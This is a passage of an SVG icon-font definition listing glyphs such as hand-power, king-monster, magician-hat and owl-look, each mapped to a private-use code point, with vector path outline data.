<glyph glyph-name="hand-power" horiz-adv-x="1000" unicode="&#xe810;" d="M760-88h-418c0 72 0 144 0 215 0 10-4 15-11 20-44 33-88 66-133 99-10 7-15 15-14 28 1 49 0 99 0 148 1 73 48 121 120 122 50 0 101-1 151 0 14 1 16-5 15-18-6-52-54-95-110-97-16-1-32-1-47 0-8 0-16-1-13-11 3-17-12-43 8-48 50-14 102-19 152-30 25-5 51-9 73-23 42-28 65-67 67-117 1-12 4-16 15-16 14 0 14 7 14 17-1 45-19 82-49 115-38 42-91 50-143 59-35 7-106-19-111 21-1 14 23 4 32 4 44 1 81 18 108 52 16 21 29 42 55 50 5 2 10 7 13 11 7 11 12 8 19 0 36-36 89-36 124 0 9 9 12 8 20 0 29-30 69-35 105-15 4 2 7 7 14 4 0-101 0-204 0-306 0-9-3-11-11-13-28-7-45-26-45-53-1-72-1-145 0-218z m-87 736c0-24 0-48-1-73 0-34-25-59-57-60-32 0-57 25-57 59-1 51-1 102 0 152 0 22 11 33 32 33 17 1 34 1 51 0 20 0 31-11 32-32 0-26 0-52 0-79z m-171-123c-4-2-2 4-2 5-1 42-1 42-44 42-42 0-42 0-42 42 0 45-1 90 0 136 0 28 9 37 37 37 15 1 31 1 47 0 20-1 31-10 31-30 0-62 0-124 0-186 0-19-7-40-27-46z m314 96c0-16 1-32 0-49-1-32-26-56-56-57-30 0-56 22-58 53-2 35-1 69 0 104 0 19 11 29 29 29 19 1 37 1 55 0 20 0 29-11 30-31 0-16 0-33 0-49z m-546 21c0 19 0 38 0 56 1 21 12 32 32 32 18 0 35 0 53 0 18 0 30-10 30-29 1-39 0-78 1-116 0-11-5-13-14-13-30 0-60 0-91-1-10 0-11 5-11 13 1 19 0 39 0 58z" />
<glyph glyph-name="hand-thunder" horiz-adv-x="1000" unicode="&#xe811;" d="M429 724c14 16 26 35 40 51 11 14 27 15 42 9 15-6 20-18 21-31-1-20-14-32-23-44-30-40-30-39-73-19-22 10-22 18-7 34z m71-65c19-8 32-20 38-46 25 32 47 60 67 89 13 18 9 38-7 50-15 12-38 9-51-8-18-22-34-45-51-67-7-9-8-14 4-18z m103 24c-27-34-52-68-78-103-8-11-7-25 1-37 7-12 18-17 29-17 13 0 22 4 28 13 26 33 52 66 77 100 11 16 6 37-8 48-14 11-37 10-49-4z m94-71c-14 11-32 12-45-1-20-21-38-43-51-69-12-23 7-50 35-50 7 0 16 3 21 10 18 21 35 43 50 67 10 15 5 32-10 43z m-124-286l56 70c11 14 21 30 29 46 9 19 16 38 15 60-39-28-55-25-83 16-6 9-10 4-15 2-15-6-31-19-43-16-13 3-18 24-30 36-25 25-55 40-86 54-5 2-12 3-9 11 3 8 9 1 13-1 18-8 35-17 53-25 20-10 41-3 50 15 11 19 5 40-16 52-32 17-66 34-100 50-22 10-41 3-52-20-11-22-20-45-30-68-10-26-7-50 7-74 21-36 45-69 70-102 9-11 10-19 4-31l-4-7-114-247c21 0 42 0 63 0l88 1-40-72-83-164c116 115 231 227 350 344l-156-6 63 76z" />
<glyph glyph-name="king-monster" horiz-adv-x="1000" unicode="&#xe812;" d="M183 106c-31-9-44 5-48 47-14-5-19-17-21-30-1-5 0-10 0-15-1-4 3-10-1-12-5-1-8 3-12 6-10 10-11 23-8 36 3 10 9 18 14 27-14 6-17 5-43-17-3 12 1 22 9 30 16 16 37 22 58 27 12 2 17 7 20 19 18 56 59 86 115 98 18 4 36 6 55 6 7 0 10 0 7 8-18 61-42 121-70 178-4 6-9 5-14 5-19-1-38 3-52 18-15 14-17 33-6 53 9 18 27 26 46 22 17-3 31-9 42-23 3-5 6-4 11-2 56 20 114 35 173 45 75 12 150 17 224-1 8-2 11 2 16 7 22 24 54 22 72-5 12-20 7-43-16-58-8-5-9-10-8-18 13-64 4-125-16-186-3-10-6-20-11-30-4-10 1-10 7-12 30-6 57-18 81-35 38-27 58-64 60-111 1-8 4-12 11-15 17-8 34-18 47-32 10-11 17-24 10-41-5 1-6 6-8 9-4 6-8 12-15 16-4 3-10 5-13 2-6-3 0-8 1-11 9-30 1-49-28-57 7 22 16 44-5 63-19-43-31-50-59-35 6 3 12 6 18 9 11 8 19 18 18 34 0 10-4 19-14 23-11 4-20 1-28-7-4-4-7-10-11-14-15 18-8 38 15 45 11 3 22 3 34 2 7 0 9 2 9 9 2 33-14 57-38 76-31 23-67 34-104 42-5 1-6-1-8-4-43-84-103-155-171-219-4-3-7-5-2-11 13-20 14-29 5-54 19 5 37 11 56 13 20 3 39 3 58-5 20-8 33-22 41-42 3-6 3-10-6-10-61 1-123 1-185 0-9 0-10 4-9 12 2 11 6 21 13 30 9 12 15 26 14 42-1 11-5 17-16 20-32 9-65 13-99 13-36 0-73-46-50-85 17-28 14-32-18-32-53 0-107 1-160 0-11 0-12 3-8 12 15 34 54 52 95 45 15-2 30-5 44-11 7-2 9-2 10 6 4 34 19 61 54 73 5 1 6 4 6 9-4 63-14 124-29 185-1 4-3 7-8 8-39 1-77-2-113-18-26-12-45-29-53-57-4-14-3-16 11-19 8-2 16-5 24-8 24-12 27-31 7-50-2 5-3 9-5 13-7 14-18 20-30 17-12-4-21-19-19-32 2-13 10-22 19-29 2-2 5-4 8-7z m252 213c6 1 13 1 19 1 46 4 90 13 134 25 32 8 63 17 91 34 27 17 33 40 15 66-5 7-11 13-17 18-3 3-6 5-5 10 3 20-7 36-25 42-17 5-33-1-44-20-2-5-5-5-10-5-23 0-45-2-67-7-9-3-13-1-17 8-16 41-63 59-103 41-40-18-59-65-39-103 9-17 10-30 4-48-12-33 3-53 37-59 9-2 18-3 27-3z m26 412c9-11 17-22 26-32 8 7 16 14 23 22 4 3 6 4 9-1 8-16 16-32 25-47 3-7 0-8-5-8-47-1-93-9-140-22 3 23 6 45 9 68 8-5 16-9 22-14 8-6 13-6 17 4 3 10 9 19 14 30z m35-269c5-35-33-59-55-59-34 0-63 29-65 62-2 28 34 56 68 56 17 0 32-6 41-20 7-11 10-25 11-39z m-103 0c0-21 20-41 41-41 20 0 47 21 47 36 0 27-20 47-47 47-24 0-40-17-41-42z m51-98c63 21 128 33 194 38-9-3-18-2-20-16-2-7-9-4-12 1-8 13-17 2-26 3-7 1-6-5-7-10 0-3-1-5-4-7-4-1-6 2-8 4-3 6-6 11-13 7-8-4-22 3-23-13-1-3-3-6-6-7-4-1-7 2-8 5-6 12-15 2-23 3-6 0-10-2-10-10 0-5-7-11-10-6-6 12-14 9-24 8z m195 140c12 0 22-11 22-24 0-12-12-24-25-24-12 0-25 13-24 24 1 13 13 25 27 24z m-2-41c10 0 17 7 17 15 0 10-8 19-18 19-9 0-17-8-16-17 0-10 8-18 17-17z" />
<glyph glyph-name="love" horiz-adv-x="1000" unicode="&#xe813;" d="M454 378c15 66 22 113 36 158 44 137 150 205 285 185 112-17 177-98 160-212-33-228-174-387-345-526-16-13-28-6-43 0-162 55-305 139-416 270-99 119-90 233 23 317 74 55 137 50 198-17 21-23 38-51 54-78 15-24 26-51 48-97z m37-109c-35 19-59 72-99 21-33-42-5-75 25-105 26-26 59-42 92-57 16-7 29-7 43 5 42 39 80 79 91 139 6 33 0 60-30 74-31 14-63 12-86-16-14-17-23-38-36-61z" />
<glyph glyph-name="magician-hat" horiz-adv-x="1000" unicode="&#xe814;" d="M709 442c22-67 41-125 60-184 14-46 9-61-33-84-46-24-95-34-146-40-94-10-187-7-278 20-22 7-43 16-62 29-23 16-32 36-23 63 30 89 60 178 90 267 2 7 5 15 10 21 50 60 103 117 164 166 28 22 56 22 83 0 116-96 232-192 348-289 20-16 11-90-11-104-15-10-26-6-23 13 7 39-14 54-46 66-43 16-84 35-133 56z m-483-129c-2-26-13-49-21-73-14-42-8-60 30-83 46-29 98-40 151-47 106-13 212-11 316 20 14 4 28 9 42 16 56 26 64 45 45 106-6 19-11 38-19 65 62-21 115-45 151-95 24-33 22-71-3-105-29-40-70-64-114-79-201-73-404-73-606-1-37 13-71 32-100 60-47 46-47 99-2 146 31 32 79 58 130 70z" />
<glyph glyph-name="native-american" horiz-adv-x="1000" unicode="&#xe815;" d="M525 123c-1 11-2 21-13 28-5 3-7 1-8-5-1-12 4-20 12-28 2-2 4-6 7-5 3 2 2 6 2 10z m412 81c-5 16-4 32-2 48 1 15-1 29-3 44-1 13-5 25-9 37-2 8-4 16-7 23-11 24-24 48-39 70-16 24-32 47-53 66-10 11-21 21-32 32-16 15-33 30-50 45-1 0-3 1-2 3 0 1 1 1 3 1 11 3 22 6 33 9-6 22-12 43-18 65-2 4-3 4-6 2-10-7-20-13-30-20-3-2-4-2-4 2 0 9-1 19 0 28 0 6-2 7-7 7-21 0-43-1-64-1-3 0-5 0-7 2-6 6-12 11-19 17-10 9-19 19-30 27-15 13-31 23-50 30-16 6-33 8-50 10-7 1-13-2-19-3-10-2-21-2-31-3-7-1-14-1-21-1-9 0-17 2-26 3-13 0-25 0-38 0-8-1-16-1-23-5-13-6-26-13-35-26-7-10-10-20-12-32-1-8 1-16 2-24 0-2 0-3-2-5-7-5-13-11-21-16-17-11-32-24-48-37-17-15-35-29-51-45-14-14-29-27-37-46-3-7-6-13-3-21 4-10 4-21 2-31-6-22-18-40-30-58-10-16-21-31-29-49-8-16-11-36 7-52 6-5 13-10 20-11 11-2 12-2 8-13l-1-3c-3-15-3-30 1-44 1-4 1-6-1-8-4-6-6-13-3-21 2-7 5-13 8-20 3-7 2-14-1-21-4-8-8-16-8-25 0-13 5-24 11-34 5-9 12-15 20-20 14-6 28-9 42-10 12 0 23 0 34 2 11 1 21 1 31 3 3 0 4 0 4-3 0-9 1-17 4-24 3-10 4-22 10-31 9-14 15-31 21-48 4-14 16-22 29-20 19 3 36 12 55 18 22 8 43 19 65 29 18 9 37 18 54 29 7 4 13 7 22 4 18-6 36-7 55-7 12 1 25 1 38-1 8-1 15-1 22-6 4-2 8-4 12-5 3-1 7-3 10 1 3 3 6 6 8 10 10 16 18 33 25 51 10 25 14 50 17 77 1 15 2 31 1 46 0 1 0 2 2 3 0 0 0-1 0-1 7-13 14-25 20-38 13-22 25-44 30-69 0-2 1-4 4-2 8 6 17 11 23 20 16 20 25 43 32 68 3 11 5 23 6 34 3 20 3 39 0 61 10-12 20-23 29-34 13-18 30-30 51-36 15-4 30-5 46-5 6 1 6 1 5 8z m-214 406c8 6 15 11 23 17 3 2 5 2 6-3l7-28c0-2 1-3-2-4-9-2-18-5-27-7-3-1-3 1-3 2-2 5-4 11-6 16-1 3 0 5 2 7z m-36-53c-14 0-22 11-22 24 0 13 12 26 23 24 10 2 22-11 23-24 0-13-11-24-24-24z m68-407c-7 10-13 20-20 29-1 2-2 4 0 7l10 17c1 2 2 2 3 1 6-6 11-11 17-17 1-1 2-2 1-4-4-11-7-22-11-33z m-37 69c-3 7-5 13-8 20-1 2-2 3-1 5 7 8 13 15 20 24 3-12 6-24 9-35 0-3 1-6 2-9 3-9 1-16-3-23-3-3-4-7-6-12-6 10-9 20-13 30z m-21 90c7 7 14 14 22 22 2-10 3-18 5-27 1-8 2-16 4-24 0-3 0-6-2-8-6-7-12-14-18-22-2 7-4 14-5 21-3 11-5 21-8 32 0 2 0 4 2 6z m-3 4c-1 9-3 18-4 26-1 7-1 14-3 21 0 3 0 5 2 7 7 7 14 14 22 21 2-11 3-22 5-33 0-3 0-7 1-10 2-5 0-8-3-11-7-7-13-14-20-21z m71-118c-7 8-16 13-20 24-4 10-6 20-7 31-1 6-3 12-2 19 12-7 23-14 35-21 1-1 2-3 2-4-1-16-1-32-5-48-1-3-1-3-3-1z m7 59c-1-1-3 1-4 1l-30 16c-3 2-5 4-6 8-2 17-5 33-7 52 14-9 28-16 41-24 4-3 2-9 3-13 2-12 2-23 3-35 1-2 1-4 0-5z m-7 60c-1 0-2 1-3 1l-36 23c-3 1-3 4-3 6-3 14-5 28-7 42 7-2 13-7 20-11 6-2 11-7 16-9 3-2 5-4 5-8l8-41c0-1 1-2 0-3z m-11 57c-13 7-25 14-37 21-3 1-3 5-3 7-3 15-4 30-7 45-2 20-6 40-9 60 0 1 0 1 0 1 1 3-2 8 2 9 4 1 5-3 6-5 7-14 12-29 17-44 5-16 13-32 17-49 4-15 9-29 14-45z m-52 81c2-14 4-28 6-42 0-3 0-6 1-9 1-5-1-8-4-11-6-7-12-13-19-21-2 10-1 18-2 26-2 35 0 69-1 104 0 5 0 12 5 12 5 0 6-7 7-12 2-15 5-31 7-47z m-1 204c3 0 4-1 4-5 0-10 0-20 0-31 0-3-1-4-4-4-11-2-19 3-25 13-6 9-14 17-21 27 16-1 31-1 46 0z m-231-612c-13-6-25-15-38-22-26-14-53-25-80-35-12-4-23-8-35-11-4-2-9-2-13-1-5 1-9 3-12 10-4 12-10 24-16 36-9 16-14 34-15 53-1 11-2 11 9 14 18 4 35 10 51 19 17 10 33 21 40 41 1 3 2 5 1 8-6-3-7-9-11-13-11-13-25-21-40-27-16-7-32-13-49-17-15-3-30-6-45-6-9 0-18-2-28-2-15 0-30 3-45 8-22 8-26 34-20 50 6 14 6 30-2 45-6 10-5 18 1 28 1 2 3 3 6 2 21-2 41-1 62 6 8 3 17 0 18-11 0 0 0-1 0-2 2-3 2-8 7-7 4 1 4 6 4 10-1 7-1 14-8 19-4 3-8 8-8 15 1 9-4 13-13 13-4 0-9 1-13 0-4 0-8 0-8-5 0-4 3-6 7-6 2 0 5-1 8-2 1 0 3 0 3-2 1-2-1-3-2-4-6-4-12-4-18-6-13-5-27-3-41-3-5 0-8 5-8 10-1 14 2 28 5 41 3 10 8 14 18 14 12 1 23 3 34 4 12 0 24-2 34-8 4-2 7-7 9-11 2-4 5-7 7-11 1-2 2-4 4-3 2 0 3 3 3 5-1 7-3 14-7 19-6 7-14 13-21 18-3 2-4 4-4 7 2 26-24 40-41 39-8 0-12-5-13-14-1-8 2-14 9-16 4-1 8-5 12-2 2 1 5 1 4 4-1 2-2 4-5 4-2 0-5-1-8 1-2 2-5 5-4 8 0 3 3 5 6 6 5 1 10 1 14-2 6-3 11-8 14-13 7-12-1-21-12-22-21-1-41-5-61-7-8 0-16-1-24 3-6 4-9 10-10 17-1 12 4 22 10 32 14 27 31 52 46 79 7 14 13 29 8 46-7 21 3 36 17 49 10 10 21 19 31 29 16 15 33 28 50 42 16 13 33 25 49 38 3 2 5 2 8-1 8-7 18-13 27-19 8-7 15-14 20-24 6-15 15-29 18-45 3-17 4-33 2-50-1-6 0-13 0-19-1-15-4-30-6-44-1-11-3-22-4-33-1-12-2-24-2-36 0-25 4-49 11-73 7-25 18-48 29-71 3-5 6-8 13-8 23 0 35-24 30-43-2-11-3-21-7-31-1-2 0-3 0-5 14-30 27-60 40-90 2-4 4-6-2-9z m77 50c-4-1-7 0-11 0-4 0-6-2-7-6-5-13-16-21-27-19-12 3-21 11-24 24-6 22-10 44-10 67-1 15-4 31-12 44-8 14-18 27-27 40-16 22-29 46-38 72-3 8-4 17-4 25-1 13-1 27 0 40 1 19 2 37 5 55 4 24 8 48 10 72 1 8 3 17 3 25 0 20-3 39-12 57-8 17-15 34-22 51-4 10-5 22-5 33 0 7 7 16 15 18 16 6 29 0 42-9 12-7 23-14 36-18 17-5 32-2 47 9 7 6 15 11 25 11 9 1 18-2 23-10 8-12 12-25 16-39 3-7 6-14 10-21 2-5 7-7 13-8 9 0 19-1 28 5 2 1 5 1 6-1 1-3 0-5-3-7-13-8-26-8-40-2-10 3-14 13-19 22-6 15-9 32-19 44-8 11-15 12-26 5-9-6-18-13-29-18-10-4-21-3-32 0-18 5-32 16-48 25-7 5-15 8-24 4-9-4-13-11-12-21 3-15 9-29 15-43 6-14 13-27 18-42 2-6 3-13 4-20 0-4 1-4 4-4 19 2 37 6 56 8 17 2 34 4 51 5 15 1 29 3 44 3 9 0 19-1 29-1 3 0 5-1 5-3 1-3-2-3-4-4-3-1-7-1-10-1-17 0-34 0-51 0-12-1-23-3-35-4-9 0-18-1-27-2-20-3-39-6-58-10-3-1-3-2-3-4 1-11 0-22-1-32-2-18-4-35-8-52-2-12-3-24-5-36-2-15-3-31-4-47-1-16 1-32 3-48 4-24 17-42 29-62 10-15 20-29 30-45 11-18 19-38 20-60 1-13 1-26 3-39 3-12 7-24 13-35 2-5 10-8 17-6 5 1 8 5 10 12 4 8-1 13-7 17-10 7-15 18-17 31-1 6 1 14 4 20 2 3 5 4 9 3 13-5 24-20 24-34v-18c0-4-1-7 3-9 5-1 9-1 12 3 4 6 7 12 8 19 1 11-4 19-9 27-9 18-21 34-35 48-21 22-42 44-57 71-5 8-8 18-12 27-6 18-9 37-8 56 1 22 2 44 3 66 2 24 5 48 12 71 3 7 7 12 15 14 7 1 12-4 16-9 5-7 9-14 14-20 0-1 0-3 2-3 1 1 2 2 2 3 1 9 2 17 3 25 1 7 3 13 5 20 2 6 4 12 11 13 6 0 12-2 16-8 5-6 10-13 15-19 4 3 4 8 5 13 1 6 2 12 4 17 1 3 3 6 6 5 2-1 4-4 3-8-3-9-4-18-8-27-4-11-10-14-18-4-5 6-11 11-15 18-2 3-4 4-6 3-3 0-4-2-4-4-3-10-4-21-4-31-1-7-4-14-7-20-3-5-8-5-13-2-5 3-9 9-12 14-3 3-6 7-8 10-4 5-9 5-11-1-4-10-7-21-9-32-2-16-3-33-4-49-2-15-4-29-5-44 0-12 0-24 3-36 2-9 3-19 5-28 2-13 10-23 17-34 12-18 27-34 41-51 13-14 26-28 37-44 9-12 17-26 19-43 2-11-8-29-18-33z m18 195c-16-17-34-32-50-49-5-5-9-4-12 2-13 24-25 48-35 73 0 3 0 4 1 6 8 19 18 37 27 57 12 27 29 52 46 77 12 17 24 35 39 51 11 11 20 25 31 35 13 13 25 26 39 37 1 1 3 2 4 3 5-10 1-16-4-22-9-11-13-24-18-36l-9-24c-8-20-12-41-18-61-7-25-15-49-20-74-4-19-6-38-11-57-2-7-4-13-10-18z m117-127c-2-19-6-38-9-56-6-26-17-50-28-73-2-5-6-9-11-9-6 0-9 4-11 9-10 20-20 40-27 61-5 15-6 30-8 45-4 26-6 53-6 83-1 15 1 34 2 53 4 50 13 99 26 147 6 20 10 41 16 61 8 23 18 46 30 68 1 2 1 4 2 5 2 2 2 6 5 4 2-1 5-3 4-8-6-21-5-42-5-63 1-8 1-17 1-25 0-22 1-43 2-65 1-18 1-36 2-54 1-19 2-38 4-57 2-14 2-28 4-43 2-16 5-31 6-48 1-11 2-23 1-35z m116 66c-1-21-5-41-11-60-4-14-8-28-15-40-7-9-14-18-22-26-3-3-4-2-5 1-4 23-17 41-27 61-8 17-16 33-26 49-4 5-4 11-4 17-1 14-4 27-5 41-1 13-3 27-5 40-4 35-5 71-6 107-1 36 0 73 0 110 0 6 1 12 2 18 0 4 2 4 5 4 4 0 3-3 3-6-4-39-4-79-3-119 1-22 2-44 4-66 2-36 10-71 18-105 7-31 19-60 35-86 6-11 13-21 21-30 6 13 9 27 14 41 8 23 8 47 8 71-1 14-2 28-4 42-2 14-3 28-7 43-1 3-1 7-2 11 2 0 2-2 3-3 8-18 17-36 26-54 2-4 2-9 2-13 1-16 2-32 1-48z m123-23c-25 1-47 8-66 25-9 8-17 16-26 24-12 12-22 28-31 43-10 18-20 36-30 55-7 14-12 29-15 45-1 5-4 10-5 16-9 27-19 54-30 80-5 12-8 26-14 38-3 5-6 10-8 16 0 2 0 4 2 4 4 1 7 4 11 6 8-22 16-44 24-66 9-23 17-48 27-71 12-28 23-56 38-83 5-9 9-18 14-27 13-27 30-51 53-69 8-6 18-9 28-11 4-1 7 0 10-2 4-1 4 0 5 4 0 19-1 38-4 57-5 32-17 62-32 90-7 13-15 24-22 36-6 11-15 21-23 31-9 11-17 23-27 33-17 16-32 33-48 49-11 10-21 22-32 32-4 4-5 8-3 14 0 1 1 3 1 5 3-2 5-4 7-6 15-16 33-30 49-46 15-15 31-31 47-46 26-24 47-52 64-83 12-21 24-43 31-67 5-18 10-36 10-55 0-21 0-43 0-64 0-5-1-7-5-7z m-124 164c4 8 6 16 8 24 1 2 1 3 2 3 2 1 2-1 2-2 12-21 24-41 36-62l2-5c4-7 3-14 0-21-4-8-6-17-9-27-15 22-28 45-40 69-3 6-5 13-1 21z m-5-3h-2c-4 9-9 17-12 26-6 12-10 25-16 37-4 10-2 20-1 30 1 3 2 7 3 11 7-13 14-25 21-37 5-8 10-17 15-25 3-4 4-9 2-14-3-9-8-18-10-28z m50-89l10 35c1 1 1 1 2 2 6-10 11-21 17-31 1-2 1-5 4-4 4 2 1 4 0 6-5 11-10 21-16 31 0 1-1 2-1 3 11-2 21-4 31-6 5-1 7-4 8-9 3-15 5-30 5-46 0-7 1-13 1-20 0-4-1-5-4-3-4 2-9 3-14 4-20 4-32 18-43 35-1 1 0 2 0 3z m40 42l-22 4c-6 1-8 6-11 10-11 20-23 40-34 59-1 2-2 4-3 6 17-5 34-9 50-14 1 0 3-2 4-3 9-16 17-33 22-52l0-1c3-10 3-10-6-9z m-44 78c-8 2-16 5-25 7-6 2-8 7-11 11-11 19-22 37-33 55-1 1-1 2-2 4 13-2 25-3 35-8 6-3 10-11 15-16 8-10 15-20 22-30 7-9 13-19 20-29-8 2-15 4-21 6z m-40 75c-13 4-23 6-34 9-3 1-4 4-5 6-4 10-12 19-17 28-1 2-2 4-3 3-2-2-2-4-1-5 4-6 6-11 10-16l11-18c2-2 2-5 1-8-2-6-2-13-4-22-17 33-26 66-36 100 28-23 51-51 78-77z m-111 125c-6-1-14-9-14-16 0-7 8-17 15-16 6 0 15 9 15 16 0 7-9 16-16 16z m-362-259c-9-8-15-19-18-30-5-13-5-26 2-38 7-12 17-19 29-22-10 14-15 31-14 49s7 35 22 48c-9 1-16-2-21-7z m308 207l7 14-2 1c-13-19-29-34-43-52-11-13-21-26-31-40-11-16-22-33-33-49-12-18-23-36-32-56-6-11-11-24-17-36-4-7-5-14-1-21 4-9 8-18 13-26 4-9 7-18 12-27 2-3 4-5 8-1 5 4 9 8 13 12 12 11 23 22 34 33 5 4 8 8 8 15 1 6 2 11 3 17 3 19 8 37 12 55 6 27 12 53 20 78 9 28 17 57 29 83z m-137-196c6 9 11 18 15 28 4 12 13 18 24 23 5 2 11 4 16 6-1-8-5-16-8-23-3-8-5-17-8-25-1-3-3-5-6-7-12-6-25-10-37-17 0 6 2 11 4 15z m53-58c-8-10-19-19-29-28-7-8-9-7-14 2-5 12-12 24-17 37-2 4-3 8-4 12-1 9 0 10 7 13 6 3 13 6 18 8 6 3 12 6 20 10-4-16-8-29-12-43-2-6-4-12-6-18-1-2-2-5 1-6 3-2 4 1 4 4 6 17 12 35 18 53 6-9 11-18 16-26 6-10 6-9-2-18z m14 14c-10 12-19 23-22 38-1 3-1 6 0 8 5 15 10 29 16 45 6-10 10-18 15-27 4 1 2 5 5 7-7-23-9-47-14-71z m14 73c-5 10-10 19-15 27-1 1-1 3-1 4 8 17 12 36 22 53 3 4 6 9 7 15 1 1 1 3 0 4-2 1-2-1-3-2-6-7-9-15-13-22-6-10-11-20-15-31-1-5-4-8-9-10-8-4-16-8-23-12 28 46 59 89 95 128-19-49-33-101-45-154z m-368 50c4 0 8 1 11 2 13 2 26 5 38 9 3 0 7 2 7 5 0 3-2 7-5 9-15 9-30 17-44 27-7 4-8 7-3 18 3 6 6 7 13 4 12-6 24-13 36-18 13-5 25-4 37 4 3 2 6 5 5 9-1 3-5 4-9 4-22-1-41 8-58 22-10 7-21 14-33 12h-4c-10 0-20-2-27-10-3-3-4-6-2-10 2-3 3-6 5-8 3-4 2-6 0-9-3-3-5-7-8-9-4-4-2-6 1-8 5-3 9-5 14-7 2-1 4-1 3-5-3-8-3-18-1-27 1-2 0-3-3-4-5 0-10-1-16-2-3 0-6-1-6-4 0-4 3-4 6-4 5-1 10-1 14 0 3 0 4-1 4-5l0-13c0-2 1-4 3-5 2-1 3 1 5 2 5 4 8 10 10 16 2 4 4 5 7 5z m0 36c14-6 27-11 40-17-11-5-22-10-34-9-3 0-6-3-8 0-2 3-2 7-2 11 1 4 2 8 2 12 0 2 0 3 2 3z m-10 25c-5 3-11 4-16 7-2 2-2 4 0 6 7 2 14 4 20 6 4 0 5-2 4-5-1-4-3-8-5-12 0-2-1-3-3-2z m225-288c-6 10-17 12-27 6-10-8-15-19-17-31-3-10-4-19-1-29 2-5 4-10 8-14 9-7 21-5 29 5 8 12 14 25 13 41 2 8-1 15-5 22z m-19-54c-3-3-6-4-10-2-4 2-7 6-7 11-1 3 0 5 0 6-1 14 4 23 13 31 7 7 17 2 18-8 2-15-2-28-14-38z m-97 244c-1 8-6 15-13 16-8 0-15-3-20-7-14-11-30-14-46-16-3 0-4 2-4 5 0 4 3 6 6 6 5 0 9 3 14 4 7 2 14 5 18 13 3 6 2 8-4 9-3 1-6 1-9 0-11-3-22-9-33-14-6-4-10-9-13-15-2-5-1-9 2-12 3-3 6-6 8-9 2-2 2-4 0-6-2-3-5-5-4-10 0-11 8-20 19-20 8 0 17 0 25 1 9 1 18 5 25 10 4 2 6 5 5 10-2 4-5 6-9 6-8 1-14-3-21-6-7-2-14-4-22-1-2 1-5 2-5 5 0 3 3 3 5 4 14 6 28 9 43 7 9 2 18-2 27 4 6 5 8 9 6 16z m-29 167c5-5 11-9 16-14 3-3 4-1 4 2 1 7-2 11-6 15-8 7-15 14-22 22-1 1-5 2-1 4 3 2 4 6 8 3 5-4 9-8 13-13 14-15 31-27 43-44 1-2 4-4 6-2 3 2 3 5 1 8-1 1-1 2-3 4-4 5-9 10-13 15-11 15-24 27-36 38-4 3-4 5 0 7 2 2 4 1 6-1 11-7 19-16 28-25 2-2 3-3 5-4 4-2 5 1 6 3 0 3-1 4-2 5-9 12-20 21-31 31-4 3-9 6-14 3-11-8-20-16-30-24-4-3-4-7 0-10 7-8 14-15 22-23z m-73-377c-1 1-3 2-5 2-10 4-21 8-29 15-4 2-7 3-11 1-3-2-7-5-11-5-3 0-3-2-3-5l-2-44c1-3 2-6 4-8 4-3 8-3 13-3 4 1 5 4 7 8 2-6 5-11 9-15 4-3 7-6 12-3 6 3 11 7 12 14 0 8-5 14-8 22 5-1 8 1 12 3 7 5 7 12 0 18z m458 74c-2 14-3 27-4 41-2 23-3 46-4 68 0 38 0 76-1 114 0 15-2 31-1 46 0 1-1 1-1 3-1-1-1-2-1-2-8-20-17-40-23-61-3-8-7-16-9-25-5-20-10-40-13-60-2-11-5-22-7-34-2-13-3-26-5-39-1-17-4-35-4-52-1-33 0-66 5-99 1-10 2-20 4-31 2-12 5-24 9-36 6-15 13-30 22-44 3 6 6 11 8 16 5 13 11 26 16 39 6 14 10 29 12 44 2 9 2 18 3 26 2 12 3 23 1 34-4 17-5 35-7 52z m-7 36c0-15 3-30 5-44 1-8 0-16 2-24-8 6-14 12-21 16-7 4-12 9-16 15-1 2-2 3-2 5-1 21 2 43 1 66 11-8 20-15 29-23 2-2 2-7 2-11z m-13 170c3 1 8-3 8-7 0-7 0-13 0-20-1-25 0-51 1-76 1-14 0-28 2-41 0-2 0-4 0-7-8 3-13 9-19 13l-1 1c-9 5-9 13-7 22 2 8 2 16 3 24 1 16 3 32 5 48 2 12 5 24 5 37 0 2 0 5 3 6z m-40-109c5 32 15 63 22 94 1 4 3 7 4 11 1 3 5 4 8 3 3-1 1-4 1-5-4-21-6-42-9-63-2-16-4-33-5-49 0-4-1-7-3-9-6-7-13-12-20-17l-2 1c1 11 3 23 4 34z m-7-58c0 9 3 15 10 21 5 4 10 9 16 14l1-1c-2-19 0-37-3-56 0-4 0-8 0-12 1-5 0-9-4-11-7-4-11-11-19-14-2-1-3-2-4 2 0 19 2 38 3 57z m2-134c0 5-2 9-2 14 0 14-2 28-1 42 0 0 0 0 0 0-4 11 2 16 10 20 5 3 10 7 16 11 1-6 1-12 2-17 0-14 0-27 1-41 0-1 0-2 0-3 2-15 3-13-10-22-4-2-7-4-11-6-3-2-5-2-5 2z m64-23c-1-6-2-12-3-18-4-10-13-14-22-5-3 3-5 8-8 12-2-11-6-15-15-15-4 0-7 3-8 6-5 9-6 19-7 30 0 2 1 3 3 4l22 13c2 1 3 1 5 0 10-6 20-13 30-19 3-2 4-5 3-8z m3 19l0-2c-2-7-2-6-8-4-9 4-17 11-25 17-3 2-5 5-5 8l-2 67c0 1 0 2 0 4 11-10 21-19 32-26 7-4 8-9 9-16 1-16 0-32-1-48z" />
<glyph glyph-name="owl-look" horiz-adv-x="1000" unicode="&#xe816;" d="M928 490c-17 8-33 17-49 25-107 50-217 83-335 77-57-3-111-17-159-48-24-15-44-35-58-61-4-8-3-10 6-12 41-11 83-15 126-17 39-2 79-1 118 2 31 3 61 9 92 15 7 2 7 5 4 11-11 22-27 39-46 54-2 1-5 2-7 2-24 0-49 2-76-4 29-10 54-19 78-34-75-31-192-26-243 1 50 29 103 42 159 47 105 10 205-10 302-52 13-5 17-11 15-25-16-148-125-272-269-308-7-2-14-6-23-2 49 103 107 195 222 239-15 9-29 3-45 4 22 12 46 16 67 32-22 3-40-1-63-2 29 16 57 24 80 45-31-8-61-17-92-25-11-3-15-7-13-18 2-9-2-17-5-24-15-38-55-68-89-67-19 1-32 11-36 27-3 8-1 13 7 15 5 1 11 10 18-1 6-11 17-13 29-11 27 4 54 33 57 60 0 6-1 9-8 7-40-15-80-26-119-43-9-4-14-9-16-19-20-86-27-173-31-261 0-10 4-12 12-11 22 2 43 5 64 10 171 40 305 181 335 353 2 9-1 14-9 19z m-458-302c-6 65-12 130-28 193-1 8-5 13-12 17-39 18-82 28-122 44-7 2-8-1-7-7 2-28 30-57 58-61 11-1 21 2 28 12 1 3 2 6 8 5 16-3 21-12 13-27-6-12-16-17-29-19-45-4-102 49-99 94 1 10-2 12-9 13-8 2-14 5-21 7-25 7-50 13-74 20 22-21 50-29 75-45-19 3-37 3-55 1 18-15 41-19 64-31-17-1-30 5-45-4 115-44 173-136 222-242-6 